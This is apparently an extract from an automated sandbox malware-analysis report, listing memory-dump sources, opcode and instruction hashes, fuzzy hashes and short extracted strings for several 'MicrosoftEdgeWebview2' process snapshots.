              • Snapshot File: hcaresult_16_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f56d7957fc958d2009eb9fe3e530472d60e962cd929bcc8c2872a14bd265f66b
              • Instruction ID: 885e5a0fea639032a052f269dcaea601df7ebd4501dd46d441fad32984016ee8
              • Opcode Fuzzy Hash: f56d7957fc958d2009eb9fe3e530472d60e962cd929bcc8c2872a14bd265f66b
              • Instruction Fuzzy Hash: E6310611B199190FE798BBBC58297B977D2EFD8701F4402BBE41CC72D7DE2868418791
              Memory Dump Source
              • Source File: 00000010.00000002.2337109104.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_16_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0cbdcaf2925b774edbaa4cfddcb8a0941cd79024f40834414653feac8cabb366
              • Instruction ID: a4336ed573413f98111ed06c74b4a2b09861750f03f51cced42124d019fe82b7
              • Opcode Fuzzy Hash: 0cbdcaf2925b774edbaa4cfddcb8a0941cd79024f40834414653feac8cabb366
              • Instruction Fuzzy Hash: 36318F35B1891A4FEB44EBA88475AEDB7E1FF98300F8005B9D419D72C6DE38B9018B51
              Memory Dump Source
              • Source File: 00000010.00000002.2337109104.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_16_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2d24ed78ff8f13d05ef452a9a65353aa54c412be5ade2c995d671c2dc6432a92
              • Instruction ID: b7b82e749add6b988c7f0c882a429c1893f62aa0c3a9470c4b5add68228a8bfd
              • Opcode Fuzzy Hash: 2d24ed78ff8f13d05ef452a9a65353aa54c412be5ade2c995d671c2dc6432a92
              • Instruction Fuzzy Hash: 49216879B64D0D5FD744EB5890A59A9BFF2FF89200FD044A8D819C73CADE3C69048751
              Memory Dump Source
              • Source File: 00000010.00000002.2337109104.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_16_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 81d3e78ce8d35803c3dfb44eca2c4b8f610711e5ec7a0d24fa8bbc1f7c2d285d
              • Instruction ID: 09fb833df99a257ae8fbc6946c966ec4c33ba5fc03f875cb79983bcdb4197aab
              • Opcode Fuzzy Hash: 81d3e78ce8d35803c3dfb44eca2c4b8f610711e5ec7a0d24fa8bbc1f7c2d285d
              • Instruction Fuzzy Hash: B3017B05E0DAE41FE7A1A73C68754757FF1CF92320B0905ABE4A8CF0E7D8087A428782
              Strings
              Memory Dump Source
              • Source File: 00000010.00000002.2337109104.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_16_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID: O_^ $O_^"$O_^$$O_^&
              • API String ID: 0-3636004760
              • Opcode ID: 5e6cb523706a7bccc332836f987ab8406d593c89340c44bd1b8a2f9fea38ae47
              • Instruction ID: 3a184c77386bbf4aa69513a3d76d5a616a8868164c12500c2b36bd44a76674bd
              • Opcode Fuzzy Hash: 5e6cb523706a7bccc332836f987ab8406d593c89340c44bd1b8a2f9fea38ae47
              • Instruction Fuzzy Hash: 222124A3A0F1654EE31227B96CB14E87F609F0061C30941F6C0FE8E197EE18319A8A84
              Memory Dump Source
              • Source File: 00000011.00000002.2361724843.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 57db11478b6477c6847a1287c5746df231ad789298286a96bb477a59d6d291c8
              • Instruction ID: a07dc9b50897a35d98cce5680223b196aab34e36b7bc3f4de55f7f938cf6cf63
              • Opcode Fuzzy Hash: 57db11478b6477c6847a1287c5746df231ad789298286a96bb477a59d6d291c8
              • Instruction Fuzzy Hash: 23420821B2CA594FE7A8FB7C84696B9B7E1FF98300F400579E45EC72D6DE28B8018741
              Memory Dump Source
              • Source File: 00000011.00000002.2361724843.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b45beed69a11b52b304ae46254e0a38b453e270f65154075d952a1e604154980
              • Instruction ID: 058095200d04c8fa7202100c25bee052bdb463837e92db6ad2c20012951a56ce
              • Opcode Fuzzy Hash: b45beed69a11b52b304ae46254e0a38b453e270f65154075d952a1e604154980
              • Instruction Fuzzy Hash: 9551FF21B1E6C90FD79AABB848756757FE1DF97219B0800FAE09DCB1E7DD086806C342
              Memory Dump Source
              • Source File: 00000011.00000002.2361724843.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 482763d8f581b8c191fbdaf1c9e9618b21cd100e455958453c42202c2a1eb9fd
              • Instruction ID: 1a076f2c747c8d18addc4c2848216d2d04a8f3d2153f374d269187b71f5c8143
              • Opcode Fuzzy Hash: 482763d8f581b8c191fbdaf1c9e9618b21cd100e455958453c42202c2a1eb9fd
              • Instruction Fuzzy Hash: 9A917922F0EA9A0FE755A76898655F87FF1EF86210B4900BBC059CB1E7DE287C468741
              Memory Dump Source
              • Source File: 00000011.00000002.2361724843.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 97b784499c1ccf7532af5f5c9d431d8570b7c0d7f5921e9caedf60f8fd7a1c22
              • Instruction ID: 41eb521e1f7b4306bb55573f562c17fdb6989114d063e39a6e8cc85b7867b0e3
              • Opcode Fuzzy Hash: 97b784499c1ccf7532af5f5c9d431d8570b7c0d7f5921e9caedf60f8fd7a1c22
              • Instruction Fuzzy Hash: 7331F121B1D9490FE798EB6C846A679B7D2EF98345F0401BEE05EC32EBDD68AC418341
              Memory Dump Source
              • Source File: 00000011.00000002.2361724843.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f56d7957fc958d2009eb9fe3e530472d60e962cd929bcc8c2872a14bd265f66b
              • Instruction ID: 885e5a0fea639032a052f269dcaea601df7ebd4501dd46d441fad32984016ee8
              • Opcode Fuzzy Hash: f56d7957fc958d2009eb9fe3e530472d60e962cd929bcc8c2872a14bd265f66b
              • Instruction Fuzzy Hash: E6310611B199190FE798BBBC58297B977D2EFD8701F4402BBE41CC72D7DE2868418791
              Memory Dump Source
              • Source File: 00000011.00000002.2361724843.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aef68f87bbfea7aa3dc7d7d51f6cdf2bdaf9f2015d772990d4d4698258211a1b
              • Instruction ID: 90e04544202703375c9ad6a6008fbc423810ab3824b3a6170937d9fc2212f47c
              • Opcode Fuzzy Hash: aef68f87bbfea7aa3dc7d7d51f6cdf2bdaf9f2015d772990d4d4698258211a1b
              • Instruction Fuzzy Hash: D5319371B1895E4FEB44FBA88475AEDBBF1FF98300F900579D419D7686DE38A8018B40
              Memory Dump Source
              • Source File: 00000011.00000002.2361724843.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b698f1626ecc7b694f6e9792f3be09d36828f034b7f011645dbc75f02ddc5acf
              • Instruction ID: 159dad3143ad31c11e0d68d36b709f11f6812168e5dea50eff2a375a594e8776
              • Opcode Fuzzy Hash: b698f1626ecc7b694f6e9792f3be09d36828f034b7f011645dbc75f02ddc5acf
              • Instruction Fuzzy Hash: 4621B33576498E5BD748FB1880A9DA9FEB1FFA9300FE044A8E80DC77CADD7469008B41
              Memory Dump Source
              • Source File: 00000011.00000002.2361724843.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 13dc8e8ab53f9b831929343729095ef6cf9406664fdacb00de3aab25e868cedf
              • Instruction ID: 630a37fa69e166ab19cd4785e3a3c3c2cb2f1806ecabfff459357d6e5cbba438
              • Opcode Fuzzy Hash: 13dc8e8ab53f9b831929343729095ef6cf9406664fdacb00de3aab25e868cedf
              • Instruction Fuzzy Hash: BA014701A0DAE41FE7A1673C28794757FF0CFA2720B0905AAE4A8CA0E6D8047A428781
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.2361724843.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID: O_^ $O_^"$O_^$$O_^&
              • API String ID: 0-3636004760
              • Opcode ID: 5e6cb523706a7bccc332836f987ab8406d593c89340c44bd1b8a2f9fea38ae47
              • Instruction ID: 3a184c77386bbf4aa69513a3d76d5a616a8868164c12500c2b36bd44a76674bd
              • Opcode Fuzzy Hash: 5e6cb523706a7bccc332836f987ab8406d593c89340c44bd1b8a2f9fea38ae47
              • Instruction Fuzzy Hash: 222124A3A0F1654EE31227B96CB14E87F609F0061C30941F6C0FE8E197EE18319A8A84
              Memory Dump Source
              • Source File: 00000012.00000002.2418702258.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 44fa92d31c0faad7cc5a1ba7208a72be45b517d777170e396409ad6abc891e99
              • Instruction ID: 1796b8cc73f7870beebe8c5f1adaa706952de5dd937b4410f5e120aeab5d828b
              • Opcode Fuzzy Hash: 44fa92d31c0faad7cc5a1ba7208a72be45b517d777170e396409ad6abc891e99
              • Instruction Fuzzy Hash: C142F621B2DA594BEBA8EB7884756BDB7E1FF98300F40057DE41EC72D6DE28B8418741
              Memory Dump Source
              • Source File: 00000012.00000002.2418702258.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ce6f0c505d613a8bf2264619c5c551923ef60d13daad3a0574f1664564fc6d62
              • Instruction ID: 25b3c15f0ffa42d6b74c06edc6c4a8e7805a9faf681982b593b42e3d4b4d9013
              • Opcode Fuzzy Hash: ce6f0c505d613a8bf2264619c5c551923ef60d13daad3a0574f1664564fc6d62
              • Instruction Fuzzy Hash: 44510F21B1E6C90FD79AABB848756757FE1DF87219B0800FAE09DCB1E7DD086806C342
              Memory Dump Source
              • Source File: 00000012.00000002.2418702258.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c00e4646ccf14d1e61a4c555f626e9b1446fcaa7224bf8ca4383765a30525862
              • Instruction ID: cfc4f99f4015f07a427b1c25f4579fcffe570ba9408e2d93b80b69b8744df13d
              • Opcode Fuzzy Hash: c00e4646ccf14d1e61a4c555f626e9b1446fcaa7224bf8ca4383765a30525862
              • Instruction Fuzzy Hash: AD916821F0EA9A0FEB95A76898715F87FF1EF86210B4900B7D059CB1E7DE287C468741
              Memory Dump Source
              • Source File: 00000012.00000002.2418702258.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7adc31cdfdda2bffbbe759de1ea26c3da51445ecc1fe1de06caf9a2a4d0f6ab6
              • Instruction ID: d7ab91db75604bb1f4a00c889cd24803c1a8c52a0f4cbe369669fc3f0b3ba27f
              • Opcode Fuzzy Hash: 7adc31cdfdda2bffbbe759de1ea26c3da51445ecc1fe1de06caf9a2a4d0f6ab6
              • Instruction Fuzzy Hash: 2531F121B1D9490FE798EB6C847A679B7D2EF98345F0401BEE05EC32EBDD68AC418341
              Memory Dump Source
              • Source File: 00000012.00000002.2418702258.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f56d7957fc958d2009eb9fe3e530472d60e962cd929bcc8c2872a14bd265f66b
              • Instruction ID: 885e5a0fea639032a052f269dcaea601df7ebd4501dd46d441fad32984016ee8
              • Opcode Fuzzy Hash: f56d7957fc958d2009eb9fe3e530472d60e962cd929bcc8c2872a14bd265f66b
              • Instruction Fuzzy Hash: E6310611B199190FE798BBBC58297B977D2EFD8701F4402BBE41CC72D7DE2868418791
              Memory Dump Source
              • Source File: 00000012.00000002.2418702258.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b7be16c87dbc116f8d3f606e82d544c05896e9c2317fbd9eb34ccc71cfb17109
              • Instruction ID: b256c5b41baac101405c78127fbd04888389fd7d89a9d8a2b076ba7ba540cd3c
              • Opcode Fuzzy Hash: b7be16c87dbc116f8d3f606e82d544c05896e9c2317fbd9eb34ccc71cfb17109
              • Instruction Fuzzy Hash: B231A471B1891D4FDF44EBA88475AED7BB1FF98300F9405B9D419D72C6DE38A8418740
              Memory Dump Source
              • Source File: 00000012.00000002.2418702258.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f2e0f6a8a66fc2da7b696e7ace6f3752e29c9a67b8ee737aef23cf93f1beec35
              • Instruction ID: 3739607aa420e14c260dd08c74bedfa0b17b5007a89e78b8599444b013a6e9b1
              • Opcode Fuzzy Hash: f2e0f6a8a66fc2da7b696e7ace6f3752e29c9a67b8ee737aef23cf93f1beec35
              • Instruction Fuzzy Hash: F8218035B6494D5BDF48EF5880B59ADBE71FF89200BE044A8E81AC73CEDE346D508740
              Memory Dump Source
              • Source File: 00000012.00000002.2418702258.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 785449ee778b2d3a42373dc866a98c319f507d18fd6bfee71cbd3d05b25c5271
              • Instruction ID: e99386fa6cbaf7a104f10b404e51947dcc9b94872f5f513d26ecf8ad032754b1
              • Opcode Fuzzy Hash: 785449ee778b2d3a42373dc866a98c319f507d18fd6bfee71cbd3d05b25c5271
              • Instruction Fuzzy Hash: 42017B01E0DAE41FEBA1673C28754757FF0DF92320B0905ABE4A8CF0E7D8047A428781
              Strings
              Memory Dump Source
              • Source File: 00000012.00000002.2418702258.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID: O_^ $O_^"$O_^$$O_^&
              • API String ID: 0-3636004760
              • Opcode ID: 5e6cb523706a7bccc332836f987ab8406d593c89340c44bd1b8a2f9fea38ae47
              • Instruction ID: 3a184c77386bbf4aa69513a3d76d5a616a8868164c12500c2b36bd44a76674bd
              • Opcode Fuzzy Hash: 5e6cb523706a7bccc332836f987ab8406d593c89340c44bd1b8a2f9fea38ae47
              • Instruction Fuzzy Hash: 222124A3A0F1654EE31227B96CB14E87F609F0061C30941F6C0FE8E197EE18319A8A84
              Memory Dump Source
              • Source File: 00000014.00000002.2923528343.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ffd9b6c0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6a44c13e353cd3fb93729ae7f5797817bce08bb00945b89e08edb6bc5d2bce16
              • Instruction ID: 0268be64248779a1e147ba8c05e509781b41ea7d717e9e6183b6c3a4cd68ee90
              • Opcode Fuzzy Hash: 6a44c13e353cd3fb93729ae7f5797817bce08bb00945b89e08edb6bc5d2bce16
              • Instruction Fuzzy Hash: 0C420721B19A0A4FE7A8FB7C84756B977D2FF98700F400579E55EC72D6DE28B8028741
              Memory Dump Source
              • Source File: 00000014.00000002.2923528343.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ffd9b6c0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bf27163a331187bc614531a5cd99314806f9c087a86a9c9cbb8796550b797b55
              • Instruction ID: 8b2a8b7776951e293942e225594d1cf1b0f7a657bac0b17e15dd04ae3030db16
              • Opcode Fuzzy Hash: bf27163a331187bc614531a5cd99314806f9c087a86a9c9cbb8796550b797b55
              • Instruction Fuzzy Hash: 7D915922F0EA8A0FE755BB6C88651F97BE1EF86310B4900B7D459CB1E7DD287C428341
              Memory Dump Source
              • Source File: 00000014.00000002.2923528343.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ffd9b6c0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2bb08f8627cef14790ecadd638327fb629c2ac056bdebe440d5ef670e2d9abb2
              • Instruction ID: def6cb9f9f278fac47c0bb714a36073fc74d792d035be0fa9618941002c649a2
              • Opcode Fuzzy Hash: 2bb08f8627cef14790ecadd638327fb629c2ac056bdebe440d5ef670e2d9abb2
              • Instruction Fuzzy Hash: 28312621B199090FEB94BBBC58297BD77D2EFA8701F4402BBE41CC72D7DE2869018381
              Memory Dump Source
              • Source File: 00000014.00000002.2923528343.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ffd9b6c0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 47c66fdf0e228add875d62df3b8ec71c0e11e680d80e08526e6efc35d2f1f3a3
              • Instruction ID: db872293571c16ee3e10e19b166aa71b4a38978c3ec60bbd60e93290488c99b6
              • Opcode Fuzzy Hash: 47c66fdf0e228add875d62df3b8ec71c0e11e680d80e08526e6efc35d2f1f3a3
              • Instruction Fuzzy Hash: 16313369B59A4A9FDB44FB6C84B04B97F70EF85300B8040B9D45ECB2DAEF24A9028751
              Memory Dump Source
              • Source File: 00000014.00000002.2923528343.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ffd9b6c0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4d531a3cf971d886a8f273068beb10db2121f8954befeb56e09d813ed8d6e0b8
              • Instruction ID: d80d6be3673a0e3160d456a965cef0f445cadd3178b785eff5c90ea9c7554df7
              • Opcode Fuzzy Hash: 4d531a3cf971d886a8f273068beb10db2121f8954befeb56e09d813ed8d6e0b8
              • Instruction Fuzzy Hash: 24310629B5A90A5BD744FB6C90618FA7F61EF85300BC080B5D95ECB3DBEF24A9438750
              Memory Dump Source
              • Source File: 00000014.00000002.2923528343.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ffd9b6c0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6ff8c4185b72b6b5bb01ed1935107bf13138c6b069be473b9923bdadf51c2f77
              • Instruction ID: f808fa7e06239519b04b1b2d6d769cc5b6d279245aa52daa893236d5c7a757ef
              • Opcode Fuzzy Hash: 6ff8c4185b72b6b5bb01ed1935107bf13138c6b069be473b9923bdadf51c2f77
              • Instruction Fuzzy Hash: D6319135B1890E4FEB54FBA884756FDB7A1FF98300F8005B9D519D7296DE39A8428740
              Memory Dump Source
              • Source File: 00000014.00000002.2923528343.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ffd9b6c0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 226cbe1e7443929c43788d277827c38bcafff73bc2f201dba762c200e07d97d3
              • Instruction ID: 3ddefd189f12f9267e6478a1a5b7aef062573b9071a5b19e434c39f4d479c764
              • Opcode Fuzzy Hash: 226cbe1e7443929c43788d277827c38bcafff73bc2f201dba762c200e07d97d3
              • Instruction Fuzzy Hash: 6621B679B64D0E5FD744EB6C90609BABF71EF89300BC044A9D85AC73DAEF34A9028750
              Strings
              Memory Dump Source
              • Source File: 00000014.00000002.2923528343.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ffd9b6c0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID: N_^ $N_^"$N_^$$N_^&
              • API String ID: 0-1033049488
              • Opcode ID: b6d5ec74bdcc98026e09decb9e32e3880b4c17e5f434fb755b1caec9f1b40154
              • Instruction ID: 47c2c81be8f21168c3d9a124f946962cca427d4bbdb9abdafa3d133341caffc6
              • Opcode Fuzzy Hash: b6d5ec74bdcc98026e09decb9e32e3880b4c17e5f434fb755b1caec9f1b40154
              • Instruction Fuzzy Hash: B72124A3A0F1950BE31637B86CB20F93F90DF0161C31941F6C6FA8E093ED18718AC686